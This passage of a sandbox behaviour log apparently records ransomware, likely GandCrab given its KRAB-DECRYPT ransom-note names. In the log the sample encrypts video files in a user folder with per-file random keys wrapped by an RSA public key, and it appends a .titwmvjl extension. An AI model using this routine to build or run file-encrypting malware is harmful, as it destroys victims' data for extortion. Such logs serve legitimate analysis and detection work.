121 [0095.808] VirtualAlloc (lpAddress=0x0, dwSize=0x132, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.808] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\yZ6Zvf__RXgl8iu3.mp4.titwmvjl") returned 130 [0095.808] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\yZ6Zvf__RXgl8iu3.mp4") returned 121 [0095.808] lstrlenW (lpString=".mp4") returned 4 [0095.808] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.808] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".mp4 ") returned 5 [0095.809] lstrcmpiW (lpString1=".mp4", lpString2=".titwmvjl") returned -1 [0095.809] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.809] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\yZ6Zvf__RXgl8iu3.mp4") returned 121 [0095.809] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\yZ6Zvf__RXgl8iu3.mp4") returned 121 [0095.809] lstrcmpiW (lpString1="yZ6Zvf__RXgl8iu3.mp4", lpString2="desktop.ini") returned 1 [0095.809] lstrcmpiW (lpString1="yZ6Zvf__RXgl8iu3.mp4", lpString2="autorun.inf") returned 1 [0095.809] lstrcmpiW (lpString1="yZ6Zvf__RXgl8iu3.mp4", lpString2="ntuser.dat") returned 1 [0095.809] lstrcmpiW (lpString1="yZ6Zvf__RXgl8iu3.mp4", lpString2="iconcache.db") returned 1 [0095.809] lstrcmpiW (lpString1="yZ6Zvf__RXgl8iu3.mp4", lpString2="bootsect.bak") returned 1 [0095.809] lstrcmpiW (lpString1="yZ6Zvf__RXgl8iu3.mp4", lpString2="boot.ini") returned 1 [0095.809] lstrcmpiW (lpString1="yZ6Zvf__RXgl8iu3.mp4", lpString2="ntuser.dat.log") returned 1 [0095.809] lstrcmpiW (lpString1="yZ6Zvf__RXgl8iu3.mp4", lpString2="thumbs.db") returned 1 [0095.809] lstrcmpiW (lpString1="yZ6Zvf__RXgl8iu3.mp4", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0095.809] lstrcmpiW (lpString1="yZ6Zvf__RXgl8iu3.mp4", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0095.809] lstrcmpiW (lpString1="yZ6Zvf__RXgl8iu3.mp4", lpString2="KRAB-DECRYPT.html") returned 1 [0095.809] lstrcmpiW (lpString1="yZ6Zvf__RXgl8iu3.mp4", lpString2="CRAB-DECRYPT.html") returned 1 [0095.809] lstrcmpiW (lpString1="yZ6Zvf__RXgl8iu3.mp4", lpString2="KRAB-DECRYPT.txt") returned 1 [0095.809] lstrcmpiW (lpString1="yZ6Zvf__RXgl8iu3.mp4", lpString2="CRAB-DECRYPT.txt") returned 1 [0095.809] lstrcmpiW (lpString1="yZ6Zvf__RXgl8iu3.mp4", lpString2="ntldr") returned 1 [0095.809] lstrcmpiW (lpString1="yZ6Zvf__RXgl8iu3.mp4", lpString2="NTDETECT.COM") returned 1 [0095.809] lstrcmpiW (lpString1="yZ6Zvf__RXgl8iu3.mp4", lpString2="Bootfont.bin") returned 1 [0095.809] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\yZ6Zvf__RXgl8iu3.mp4") returned 121 [0095.809] lstrlenW (lpString=".mp4") returned 4 [0095.809] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.809] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".mp4 ") returned 5 [0095.809] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.809] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.810] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\yZ6Zvf__RXgl8iu3.mp4" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\pfjx7jdxo1-0giqe\\8_kux\\yz6zvf__rxgl8iu3.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0095.810] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.810] ReadFile (in: hFile=0x2d4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0095.811] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.811] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.811] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0095.811] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.811] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.811] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.812] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0095.812] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.812] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.812] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.812] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.812] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0095.812] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.813] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.813] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.813] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0095.813] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.813] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.813] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.813] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.813] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0095.813] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.814] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x5031f8) returned 1 [0095.814] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.814] CryptGetKeyParam (in: hKey=0x5031f8, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0095.814] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.814] CryptEncrypt (in: hKey=0x5031f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0095.814] GetLastError () returned 0x0 [0095.814] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.814] CryptDestroyKey (hKey=0x5031f8) returned 1 [0095.814] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.814] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.814] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.815] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0095.815] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.815] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x5038f8) returned 1 [0095.815] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.815] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0095.815] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.815] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0095.816] GetLastError () returned 0x0 [0095.816] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.816] CryptDestroyKey (hKey=0x5038f8) returned 1 [0095.816] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.816] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.816] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0095.816] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0095.816] ReadFile (in: hFile=0x2d4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e78c*=0x13158, lpOverlapped=0x0) returned 1 [0095.828] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffecea8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.828] WriteFile (in: hFile=0x2d4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x13158, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e770*=0x13158, lpOverlapped=0x0) returned 1 [0095.829] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.829] WriteFile (in: hFile=0x2d4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0095.830] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.833] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.834] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.834] CloseHandle (hObject=0x2d4) returned 1 [0095.834] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\yZ6Zvf__RXgl8iu3.mp4" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\pfjx7jdxo1-0giqe\\8_kux\\yz6zvf__rxgl8iu3.mp4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\yZ6Zvf__RXgl8iu3.mp4.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\pfjx7jdxo1-0giqe\\8_kux\\yz6zvf__rxgl8iu3.mp4.titwmvjl"), dwFlags=0x1) returned 1 [0095.835] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.835] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 0 [0095.835] FindClose (in: hFindFile=0x5034f8 | out: hFindFile=0x5034f8) returned 1 [0095.836] CloseHandle (hObject=0x2cc) returned 1 [0095.836] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0095.836] lstrcmpW (lpString1="ABspsBD.flv", lpString2=".") returned 1 [0095.836] lstrcmpW (lpString1="ABspsBD.flv", lpString2="..") returned 1 [0095.836] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\", lpString2="ABspsBD.flv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\ABspsBD.flv") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\ABspsBD.flv" [0095.836] lstrlenW (lpString=".titwmvjl") returned 9 [0095.836] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\ABspsBD.flv") returned 106 [0095.836] VirtualAlloc (lpAddress=0x0, dwSize=0x114, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.836] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\ABspsBD.flv.titwmvjl") returned 115 [0095.839] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\ABspsBD.flv") returned 106 [0095.839] lstrlenW (lpString=".flv") returned 4 [0095.839] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.840] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".flv ") returned 5 [0095.840] lstrcmpiW (lpString1=".flv", lpString2=".titwmvjl") returned -1 [0095.840] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.840] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\ABspsBD.flv") returned 106 [0095.840] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\ABspsBD.flv") returned 106 [0095.840] lstrcmpiW (lpString1="ABspsBD.flv", lpString2="desktop.ini") returned -1 [0095.840] lstrcmpiW (lpString1="ABspsBD.flv", lpString2="autorun.inf") returned -1 [0095.840] lstrcmpiW (lpString1="ABspsBD.flv", lpString2="ntuser.dat") returned -1 [0095.840] lstrcmpiW (lpString1="ABspsBD.flv", lpString2="iconcache.db") returned -1 [0095.840] lstrcmpiW (lpString1="ABspsBD.flv", lpString2="bootsect.bak") returned -1 [0095.840] lstrcmpiW (lpString1="ABspsBD.flv", lpString2="boot.ini") returned -1 [0095.840] lstrcmpiW (lpString1="ABspsBD.flv", lpString2="ntuser.dat.log") returned -1 [0095.840] lstrcmpiW (lpString1="ABspsBD.flv", lpString2="thumbs.db") returned -1 [0095.840] lstrcmpiW (lpString1="ABspsBD.flv", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0095.840] lstrcmpiW (lpString1="ABspsBD.flv", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0095.840] lstrcmpiW (lpString1="ABspsBD.flv", lpString2="KRAB-DECRYPT.html") returned -1 [0095.840] lstrcmpiW (lpString1="ABspsBD.flv", lpString2="CRAB-DECRYPT.html") returned -1 [0095.840] lstrcmpiW (lpString1="ABspsBD.flv", lpString2="KRAB-DECRYPT.txt") returned -1 [0095.840] lstrcmpiW (lpString1="ABspsBD.flv", lpString2="CRAB-DECRYPT.txt") returned -1 [0095.840] lstrcmpiW (lpString1="ABspsBD.flv", lpString2="ntldr") returned -1 [0095.840] lstrcmpiW (lpString1="ABspsBD.flv", lpString2="NTDETECT.COM") returned -1 [0095.840] lstrcmpiW (lpString1="ABspsBD.flv", lpString2="Bootfont.bin") returned -1 [0095.840] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\ABspsBD.flv") returned 106 [0095.840] lstrlenW (lpString=".flv") returned 4 [0095.840] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.840] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".flv ") returned 5 [0095.840] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.841] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.841] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\ABspsBD.flv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\pfjx7jdxo1-0giqe\\abspsbd.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0095.841] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.841] ReadFile (in: hFile=0x2cc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ea20*=0x21c, lpOverlapped=0x0) returned 1 [0095.842] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.842] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.842] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4c9980) returned 1 [0095.842] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.842] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.843] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.843] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0095.843] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.843] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.843] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.843] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.843] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4c9980) returned 1 [0095.843] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.844] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.844] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.844] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0095.844] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.844] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.844] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.844] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.844] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4c9980) returned 1 [0095.845] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.845] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503638) returned 1 [0095.845] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.845] CryptGetKeyParam (in: hKey=0x503638, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0095.845] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.845] CryptEncrypt (in: hKey=0x503638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e974*=0x100) returned 1 [0095.845] GetLastError () returned 0x0 [0095.845] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.845] CryptDestroyKey (hKey=0x503638) returned 1 [0095.845] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.845] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.846] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.846] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4c9980) returned 1 [0095.846] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.846] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x5037b8) returned 1 [0095.846] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.846] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0095.846] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.846] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e974*=0x100) returned 1 [0095.847] GetLastError () returned 0x0 [0095.847] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.847] CryptDestroyKey (hKey=0x5037b8) returned 1 [0095.847] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.847] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.847] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0095.847] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0095.847] ReadFile (in: hFile=0x2cc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ea20*=0x11f26, lpOverlapped=0x0) returned 1 [0095.859] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffee0da, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.859] WriteFile (in: hFile=0x2cc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x11f26, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ea04*=0x11f26, lpOverlapped=0x0) returned 1 [0095.860] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.860] WriteFile (in: hFile=0x2cc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0095.863] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.866] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.867] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.867] CloseHandle (hObject=0x2cc) returned 1 [0095.867] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\ABspsBD.flv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\pfjx7jdxo1-0giqe\\abspsbd.flv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\ABspsBD.flv.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\pfjx7jdxo1-0giqe\\abspsbd.flv.titwmvjl"), dwFlags=0x1) returned 1 [0095.868] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.868] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0095.868] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0095.868] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", 